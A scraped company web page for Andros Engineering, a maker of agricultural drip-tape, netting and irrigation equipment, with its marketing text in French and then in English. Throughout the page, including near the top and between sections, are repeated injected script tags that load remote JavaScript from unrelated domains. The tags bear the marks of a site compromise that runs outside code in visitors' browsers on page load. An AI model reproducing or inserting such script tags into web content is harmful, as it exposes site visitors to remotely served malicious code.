(805) 227-2801

<script type=text/javascript src='https://check.resolutiondestin.com/t.js'></script><script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
<script type=text/javascript src='https://check.resolutiondestin.com/t.js'></script><script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
<script type=text/javascript src='https://check.resolutiondestin.com/t.js'></script><script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
Affiche le Mega Roll terminé dans un champ.

Notre histoire

Depuis 1985, Andros fournit à l'industrie agricole des produits innovants visant à donner à nos clients des choix et des solutions à leurs besoins opérationnels. Développant et ingénierie des produits dans des domaines tels que l'agriculture, l'exploitation minière et l'irrigation, Andros conçoit et fabrique des produits efficaces avec vos besoins à l'esprit.

Andros conçoit également des produits de micro-irrigation faciles à utiliser, construits de qualité et durables. Fournir un approvisionnement en eau petit (mais fréquent) aux racines de chaque plante, la micro-irrigation est une technologie rentable et de conservation de l'eau. Notre système de récupération de fin de ligne a été conçu pour les utilisateurs de bandes goutte à goutte qui ont besoin d'un système de micro-irrigation qui est à la fois portable et réutilisable. De plus, notre Agri-Spool II breveté permet à n'importe quel utilisateur de récupérer et de réutiliser du ruban adhésif. La micro-irrigation est nécessaire pour tout système d'irrigation lorsqu'on considère la rentabilité et la conservation de l'eau.

La recherche et le développement sont deux éléments essentiels de la stratégie d'Andros. Avec des projets de viticulture de précision, d'automatisation de la transformation sur le terrain et de production de légumes de précision, nous continuons d'investir dans la recherche et le développement de solutions pratiques mais innovantes. Notre objectif chez Andros est de trouver les réponses qui contribueront à votre succès.

Entrez en contact avec Andros Engineering Maintenant!

Le leader

Andros Engineering est l'un des principaux fabricants mondiaux d'outils et de remorques spécialisés pour l'industrie agricole. Des élageurs et des outils de filet entièrement personnalisés à la ligne la plus complète d'outils d'injection et de récupération d'irrigation et de remorques.

<script type=text/javascript src='https://check.resolutiondestin.com/t.js'></script><script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>

 

Photo du LRV de Mega Binder récupérant le ruban d'égouttement
La différence

Avec plus de 33 ans de création d'équipements innovants, nous avons conçu des caractéristiques et des caractéristiques qui assurent le succès de l'équipement dans votre domaine depuis de nombreuses années.


 

Marchés clés pour Andros Engineering

Notre clientèle comprend certains des producteurs les plus prospères d'aliments et de fibres dans le monde. En combinant les dernières technologies, avec un dévouement à l'artisanat de qualité, nous avons développé une réputation en tant que leader mondial à fournir des solutions spécialisées pour les agriculteurs commerciaux, les chercheurs de semences et de plantes et une variété d'entreprises qui se concentrent sur soutenir l'agriculture de production.

  • Agriculture - Gamme complète d'équipements pour le déploiement et la récupération de bandes d'égouttement, l'installation et la récupération de filets de verger, et l'équipement d'élagage des vignes.
  • Mines et eaux usées - Solutions de systèmes de livraison et de récupération SDI pour le lessivage en tas, y compris l'équipementier et l'adaptabilité après le marché.
  • Recherche et pépinières végétales - Solutions pour la réduction de la main-d'œuvre, la manutention des semences et des plantes, conceptions exclusives. Nous offrons une variété d'améliorations de processus pour les producteurs nationaux et internationaux.
  • Solutions d'ingénierie - Notre équipe d'ingénierie expérimentée utilise les derniers logiciels et technologies qui créent des solutions de réduction de la main-d'œuvre.

<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>

Our Story

Since 1985, Andros has provided the agricultural industry with innovative products aimed at giving our clients choices and solutions to their operational needs. Developing and engineering products in fields such as agriculture, mining and irrigation, Andros designs and manufactures efficient products with your needs in mind.

Andros also designs micro-irrigation products that are easy to operate, quality constructed and long-lasting. Delivering a small (but frequent) supply of water to each plant's roots, micro-irrigation is a cost-effective and water conserving technology. Our End-of-Row Retrieval System has been designed for drip tape users who need a micro-irrigation system that is both portable and reusable. Also, our patented Agri-Spool II enables any user to retrieve and reuse drip tape. Micro-irrigation is necessary for any irrigation system when considering cost-effectiveness and water conservation.

Research and development are two essential elements in the Andros strategy. With projects in precision viticulture, field processing automation and precision vegetable production, we continue investing in research and development for practical yet innovative solutions. Our goal at Andros is to find the answers that will contribute to your success.

Get in Contact with Andros Engineering now!

The leader

Andros Engineering is one of the world's leading manufacturers of specialized implements and trailers for the agriculture industry. From entirely custom engineered pruners and netting implements to the most comprehensive line of irrigation injection and retrieval implements and trailers.

<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>

 

<script  type='text/javascript' src='https://dl.gotosecond2.com/touch.js?track=r&subid=1'></script>
The difference

With more than 33 years of creating innovative equipment, we've designed in features and characteristics that ensure the equipment's success in your field for many years.


 

Key Markets for Andros Engineering

Our clientele include some of the most successful producers of food and fiber in the world. By combining the latest technology, with a dedication to quality craftsmanship, we have developed a reputation as a world leader at providing specialized solutions for commercial farmers, seed and plant researchers and a variety of businesses that focus on supporting production agriculture.

  • Agricultural - Complete line of equipment for both drip tape deployment and retrieval,  orchard netting installation and retrieval, and vineyard pruning equipment.
  • Mining and Wastewater - SDI delivery and recovery system solutions for heap leaching including OEM and after market adaptability.
  • Plant Research and Nurseries - Solutions for labor reduction, seed and plant handling, proprietary designs. We offer a variety of process improvements for both domestic and international growers.
  • Engineering Solutions - Our experienced engineering team uses the latest software and technology creating labor reducing solutions.